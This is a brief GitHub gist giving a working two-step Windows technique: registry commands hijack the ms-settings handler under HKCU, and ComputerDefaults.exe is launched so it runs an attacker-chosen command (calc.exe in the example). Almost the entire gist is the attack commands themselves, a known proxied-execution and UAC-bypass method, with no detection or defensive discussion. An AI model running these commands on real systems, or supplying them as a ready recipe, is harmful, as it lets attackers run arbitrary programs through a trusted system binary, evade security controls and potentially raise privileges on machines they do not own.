Skip to content

Instantly share code, notes, and snippets.

View havoc3-3's full-sized avatar

Eron Clarke havoc3-3

2 followers · 2 following
View GitHub Profile
@havoc3-3
havoc3-3 / lolbin_execution.md
Last active April 24, 2025 09:06
Proxied Execution techniques utilizing registry hijacks.

Proxied Execution using ComputerDefaults.exe using ms-settings Registry Hijacking

Step 1: Create or modify the registry key

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f

Step 2: Execute ComputerDefaults.exe

This will trigger the execution of calc.exe

C:\Windows\System32\ComputerDefaults.exe